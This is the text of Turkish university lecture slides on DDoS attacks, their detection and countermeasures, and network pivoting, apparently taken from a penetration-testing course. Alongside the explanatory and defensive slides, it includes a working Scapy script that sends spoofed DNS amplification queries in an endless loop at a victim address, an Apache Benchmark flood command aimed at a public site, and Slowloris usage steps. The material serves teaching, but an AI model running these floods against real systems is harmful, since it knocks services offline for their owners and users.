Upload
others
View
3
Download
0
Embed Size (px)
Citation preview
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
12 - Servis Dışı Bırakma Testleri - PivotingBGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri
Bilgi Güvenliği MühendisliğiYüksek Lisans Programı
Dr. Ferhat Özgür Ç[email protected]
İstanbul Şehir Üniversitesi2018 - Güz
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SYN Flood - Metasploit
SYN Flood
I RHOST: Hedef adresI RPORT: Hedef port
I SHOST: Kaynak IP adresi,(spoofable)
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DNS Amplification I
DNS AmplificationI Yansıtma (Reflection) saldırısıdır. Kurban adresi kullanılarak IP spoofing.I Sorgu paketleri yaklaşık 60 byte, cevap paketleri 3-4 kbyte (x50-70)I Saldırgan, hedef A kaydı için kurban kaynak adresine sahip bir DNS
isteği gönderir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DNS Amplification II
Şekil: DNS Amplification 1
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DNS Amplification III
Şekil: Spamhouse DDoS Saldırısı 2
1http://blog.sflow.com/2013/10/dns-amplification-attacks.html2https://blog.cloudflare.com/the-ddos-that-knocked-spamhaus-offline-and-ho/
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DNS Amplification - Scapy I
#!/usr/bin/pythonfrom scapy.all import *victimIP = "192.168.4.46"dnsIP = "8.8.8.8"while True:
send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.sehir.edu.tr")),verbose=0)
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
HTTP GET Seli I
HTTP GET SeliI Sahte olmayan IP adresleri ile bir veya birden fazla makineden eş
zamanlı olarak istek gönderilmesi.I Web sunucusuna veya uygulamaya saldırmak için görünürde meşru olan
HTTP GET veya POST isteklerini kullandığı (DDoS) saldırısı.I Kullanılan araçlar
I Apache JMeter (Load testing)I AB: Apache HTTP server benchmarking tool
Listing 1: Apache Benchmark HTTP GET Seli
$ ab -n 10000 -c 500 http://www.google.com/
-c Bağlantı sayısı (concurrency)
-n İstek sayısı (requests)
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
HTTP GET Seli II
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
HTTP GET Seli III
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
HTTP GET Seli IV
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris I
Slowloris/SlowHTTPI Diğer flood saldırı yöntemlerinden farklıI Birden fazla bağlatı açarI Açılan bağlantıları olabildiğince uzun şekilde açık tutmaya çalışır.I Tamamlanmayan HTTP istekleri gönderir. Hiçbir zaman tam döngü
olmazI Sunucunun ”maximum concurrent connection pool” doldurmaya çalışır.
How use Slowloris
Requirements:# sudo apt-get update# sudo apt-get install perl# sudo apt-get install libwww-mechanize-shell-perl# sudo apt-get install perl-mechanize
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris II
1)Download slowloris.pl2)Open Terminal2)# cd /thePathToYourSlowloris.plFile3)# ./slowloris.pl4)# perl slowloris.pl -dns (Victim URL or IP) -options
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris III
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris IV
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris V
$ apachectl status...
CPU Usage: u2.18 s.2 cu0 cs0 - .27% CPU load
.817 requests/sec - 11.1 kB/second - 13.5 kB/request
131 requests currently being processed, 2 idle workers
very low CPU usage, a lot of Apache processes, very few new requests/s.
$ ps aux | grep httpd | wc -l113
Slowloris works by making more and more requests, until it reaches yourApache’s MaxClients limit.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris VI
Listing 2: Apache 2.4
$ tail -f /var/log/httpd/error.log...[mpm_prefork:error] [pid 7724] AH00161: server reachedMaxRequestWorkers setting, consider raising theMaxRequestWorkers setting
Listing 3: Apache 2.2
$ tail -f /var/log/httpd/error.log...[error] server reached MaxClients setting, considerraising the MaxClients setting
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris VII
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Slowloris VIII
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Lab
LabI DDoS-1 Payload ve Payload olmadan paket gönderimi
I time curl -I http://192.168.1.1 | grep HTTPI Wireshark Graph I/O
I DDoS-2 DNS AmplificationI Wireshark
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Giriş
DDoS Saldırı AlgılamaI DDoS saldırılarını algılama yöntemleri genel olarak, daha önce trafik paternlerinin
(desenlerinin) izlenmesine dayanır.I Trafik izlenerek, patern üzerinde meydana gelen beklenmeyen değişiklikler
gözlemlenir.I illegal trafik
I Saldırı: normal ve beklenen trafik üzerinde meydana gelen anormal ve dikkatçekici olan sapmalar.
I Kullanılan teknik:I Hizmet kesintiye uğramadan algılamalı.I Hızlı şekilde cevap vermeli.I False-positive oranı düşük olmalı.
I Kullanılan yöntemler:I Activity Profile I Sequential Change point I Wavelet analysis
I Bütün teknikler, normal ağ trafik istatistiklerinin belirli bir eşik değerinden sapmasıolarak bulunur.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Active Profiling
Active ProfilingI Activity profile: Belirli bir zaman süresi (örnek 1 sn) içerisinde ağ
içerisinde gelen paket, istek sayısıI Paket başlık bilgileri kullanılır.
I ProtokolI Src/Dst IPI Src/Dst Port
I Benzer özelliklere sahip olan istekler farklı kümelere ayrılır.I Activity level: Bir kümede yer alan network flow’larının sayısı bize o
kümenin aktivite sayısını verir. (Belirli bir süre dahilinde)I Activity level içerisinde meydana gelecek artış bize bir DDoS
olabileceğinin sinyalini verir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Active Profiling - Backscatter Analysis Project
Backscatter Analysis Project3
I Amaç: DDoS aktivitesini algılamak.I Saldırganlar kaynak IP adres sahtekarlığı (src IP spoofing) yapar,I Kurban, spoof edilmiş adrese cevap gönderdir.I Paketler geri yayılırlar (backscattered)I Bu çalışmada geri-yayılan (backscattered) paketler, kaynak IP
adreslerine göre (kurban) kümelenir.I her bir küme içerisinde aktivite seviyesi, gönderdiği paketlerde yer alan
IP adreslerinin değeridir.
3Moore, David, et al. Inferring internet denial-of-service activity. ACM Transactions on Computer Systems (TOCS) 24.2 (2006):115-139.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Active Profiling - Activity Level DDoS Detection I
Activity Level DDoS Detection4
I IP başlıklarında yer alan bazı bilgilerinin entropy ve ki-kare (chi-square)dağılımları hesaplanarak ulaşılmaktadır.
I Entropy (Information Theory): Düzensizliğin ölçüsü, n adet bağımsızdeğişken ve herbirinin seçilme olasılığı pi olsun; H = −
∑ni=1 pi log2 pi
I Kümeler, en çok görünen kaynak IP adreslerine göre ayrılır.I Kume1: 1 IP adresi.I Kume2: 4 IP adresi.I Kume3: 256 IP adresi.
I Kume4: 4096 IP adresi.
I Kumen : Geri kalan bütün kaynak IP adresleri
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Active Profiling - Activity Level DDoS Detection II
Paketler aynı IP adresi üzerinden geldiği zaman entropy değeri düşük,farklılaşma olduğu zaman entropy değeri yüksek.
4Feinstein, Laura, et al. ”Statistical approaches to DDoS attack detection and response.” DARPA Information Survivability Conferenceand Exposition, 2003. Proceedings. Vol. 1. IEEE, 2003.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Sequential Change-Point Detection I
Sequential Change-Point DetectionI Yöntem genel olarak saldırılar sonucunda trafik istatistiğinde meydana gelen ani değişimleri
algılar.I Hedef Bilgisayar, hedef port, haberleşme protokolüne göre filtreleme yapar.I Ağ trafiğini zaman-serisi şeklinde saklar.I Ağ akış oranında herhangi bir değişiklik olduğunda bunu bilgilendirir.I CUSUM sürekli veriler üzerinde çalışan bir değişim noktası tespit algoritmasıdır.
I Eşik değeri seçimine göre false-positive veya algılama gecikmesi yaşanabilir.
xn: samples from a process (packet size), ω: weight (trend), h: threshold
g0 = 0, gt = max(0, gt−1 + xn + ω) ifgt ≥ h then alarm and gt = 0 (1)
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Sequential Change-Point Detection II
Şekil: DDos Saldırısı5
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Sequential Change-Point Detection III
5Wang, Shangguang, et al. ”Detecting SYN flooding attacks based on traffic prediction.” Security and Communication Networks 5.10(2012): 1131-1140.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Dalgacık Analizi (Wavelet Analysis)
Time-frequency representation of a continuous signal.
Şekil: Dalgacık Analizi 6
6http://groups.geni.net/geni/wiki/FirstGenBrooksDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Karşı Önlemler
Karşı ÖnlemlerI Saldırının absorbe edilmesiI Servis hizmetinin azaltılmasıI Hizmetin kapatılması
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Saldırıyı Absorbe Etmek
Saldırıyı Absorbe EtmekI Ek kapasiteye ihtiyaç duyulur.I Daha önceden planlama ve çözümün gerçekleştirilmiş olması gerekir.I Kapasitenin eklenmesiyle ilgili doğrudan ve devam eden maliyetlerin
bilincinde olmamız gerekirI computing, storage, network equipment, standby servers, replication of data
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Servis Hizmetinin Azaltılması
Servis Hizmetinin AzaltılmasıI Saldırı esnasında bütün servislerin ayakta ve çalışır halde olması
gerekmeyebilir.I Kritik işletme fonksiyonlarını yerine getiren bilişim sistemleri
değerlendirilmeliI Bunların DoS saldırısına karşı korunması için strateji belirlenmelidir.I Sunulan hizmetlerden alt kümeler oluşacak şekilde (örn: kritik servisler)
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Hizmetin Kapatılması
Hizmetin KapatılmasıI Zarar, kontrolün ötesine geçtiğinde, tüm servisleri planlı bir şekilde
kapatmak ve ardından aşamalı bir şekilde normale dönmek en iyisidir.I Tüm saldırılara karşı koruma sağlamak için kolay bir yol veya tek bir yol
yoktur.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Egress Filtering
Egress FilteringI Ağdan ayrılan IP paket üstbilgileri geçerli kriterleri karşılayıp
karşılamadıklarını kontrol etmek için taranır.I Kriterleri karşılayan paketlerin ağın dışına çıkmasına izin verilecektirI Sahte IP adresleri bulunan birçok DDoS paketi iptal edilir.I Yetkisiz veya kötü niyetli trafiğin ev ağından ayrılmasına izin vermez.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Ingress Filtering
Ingress FilteringI Tanım: gelen paketlerin aslında kaynak olduklarını iddia eden ağlardan
geldiğine emin olmak için kullanılan bir tekniktir.I Paketler ağ’ınız içerisine alınmadan önce doğru olmayan adreslere
sahiplerse, bunları filtreleyin.I Meşru (legitimate) kaynak IP
I Bilinen IP adreslerinden gelen saldırıları engellemez.I Saldırganın sahte kaynak IP adreslerinden saldırı başlatmasını yasaklar.I Bu filtreleme, kaynak adresi izlememize yardımcı olur.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Ingress - Egress Filtering
Şekil: Ingress - Egress Filtering 7
7http://1100029f.blogspot.com.tr/2012/04/ccd2c01-p02-1100029f.htmlDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
TCP Intercept I
TCP InterceptI TCP sunucularını SYN flood saldırılarından korumak için tasarlanmıştır.I TCP Intercept yazılımları, istemci tarafından gönderilen SYN paketlerini
keser, eğer istemci erişim listesinde (access list) yer alırsa bağlantıyı izinverir.
I Aynı şekilde sunucu ile istemcinin yerine iletişime geçer bağlantıkurulduktan sonra aradan çekilir.
I Sahte istemci bağlantı isteklerinin sunucuya ulaşmasını engeller.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
TCP Intercept II
Şekil: TCP Intercept 8
8http://flylib.com/books/en/2.464.1.51/1/Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Honeypots
HoneypotsI Honeypots: Sahte bilgisayar sistemleri
I Yem olarak kurulurlarI Saldırganlar hakkında bilgi toplamak için kullanılır.
I Sınırlı güvenlik ayarlarına sahip sistemlerI Saldırganı çekmekI Footprint tanımakI Ana Sunucuyu korumak
I Saldırganların dikkatini ana sunucu yerine bunlara yönlendirmek içinkullanılır.
I Saldırı yöntemleri, teknikleri vb. hakkında yeterli bilginin eldeedilebilmesi için ana sunucuların hemen hemen tüm özelliklerine sahipolmalı.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Honeypots Türleri I
High interaction honeypotsI Gerçek zafiyet içeren hizmetler
ve yazılımlar içerir.I Gerçek işletim sistemleri ve
uygulamalar içerirler.I Saldırının, sızma saldırısının
veya zararlı yazılımın gerçekortamda nasıl çalışacağınaulaşılır.
I Honeynets: tuzak da dahilolmak üzere tüm bilgisayarağının tüm düzenini içerenaltyapıdır ve saldırı ayrıntılarınıyakalarlar.I http://project.honeynet.org
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Honeypots Türleri II
Low interaction honeypotsI Saldırgan veya zararlı yazılımla
kısıtlı etkileşime girenlerI sunulan bütün servisler taklit
(emulate) edilir.I Kendisi zafiyet içermemekte,
dolayısıyla sömürüler (exploits)sonucunda enfekte olmayacaktır.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Load-Balancing
Load-Balancing
I İşi, iki ya da daha fazla bilgisayar, işlemci, sabit disk ya da diğerkaynaklar arasında paylaştırma teknolojisidir. 9
I En iyi kaynak kullanımı, en yüksek işlem hacmi, en düşük cevap süresisağlanabilir; oluşabilecek aşırı yüklemeden(overload) kurtulunabilir.
9https://tr.wikipedia.org/wiki/Yuk dengelemeDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DDoS’a Karşı Çözümler (SANS)
Leveraging the Load Balancer toFight DDoSI https://www.sans.org/reading-
room/whitepapers/firewalls/leveraging-load-balancer-fight-ddos-33408
I Günümüzde görülen DDoSsaldırılarının, web ortamında yeralan load-balancer teknolojilerikullanarak nasıl giderilebileceğinianlatmaktadır.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
RFC 3704 Filtreleme
RFC 3704 FiltrelemeI RFC 3704: Ingress Filtering for Multihomed Networks (filter at the ISP
before enters the Internet link.)I Black hole filtering (Discarding packets at the routing level)
I Gelen veya giden trafiğin silindiği (veya ”düştüğü”) ağdaki yerleri ifade eder,kaynağa verilerin hedeflenen alıcıya ulaşmadığına dair bilgi vermez.
I Servis sağlayıcılar tarafından genellikle erişim listeleri uygulanmadan trafikfiltrelemesi için kullanılan bir tekniktir.
I Örnekler: ”packets destined to 192.168.1.1 are discarded”, ”Disable ICMPunreachable packets”
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Gelişmiş Koruma Araçları
Araçlar
I DDoS ProtectorI FortiDDoS appliancesI Arbor Pravail Availability
Protection SystemI Cisco Guard XT
I WanguardI SDL Regex FuzzerI NetFlow AnalyzerI Netscaler application firewallI AntiDDoS Guardian
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Karşı Önlemler
Karşı ÖnlemlerI Disable unused and insecure servicesI Update kernel to the latest releaseI Deny external ICMP traffic accessI
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DDoS Pentest I
